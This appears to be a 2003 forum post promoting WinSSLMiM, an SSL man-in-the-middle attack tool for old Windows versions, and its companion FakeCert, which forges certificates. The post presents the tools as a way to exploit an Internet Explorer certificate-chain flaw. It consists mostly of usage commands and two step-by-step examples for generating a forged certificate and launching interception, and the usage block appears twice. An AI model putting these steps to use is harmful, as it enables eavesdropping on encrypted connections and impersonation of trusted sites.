admin
06-29-2003, 12:07 AM
WinSSLMiM is an [Only registered and activated users can see links] Man in the Middle attacking tool. It includes FakeCert, a tool to make fake certificates (like the DCA of sslmim found in Phrack 57). It can be used to exploit the Certificate Chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000.
Usage :
- FakeCert : fc -h
- WinSSLMiM : wsm -h
Example 1:
Generate fake certificate: fc -s [Only registered and activated users can see links] -f fake_cert.crt
Launch WinSSLMiM: wsm -f fake_cert.crt
Example 2 (IE vulnerability):
Generate fake certificate : fc -s [Only registered and activated users can see links] -f fake_cert.crt -t trust.crt
Launch WinSSLMiM: wsm -f fake_cert.crt -t trust.crt
Usage :
- FakeCert : fc -h
- WinSSLMiM : wsm -h
Example 1:
Generate fake certificate: fc -s [Only registered and activated users can see links] -f fake_cert.crt
Launch WinSSLMiM: wsm -f fake_cert.crt
Example 2 (IE vulnerability):
Generate fake certificate : fc -s [Only registered and activated users can see links] -f fake_cert.crt -t trust.crt
Launch WinSSLMiM: wsm -f fake_cert.crt -t trust.crt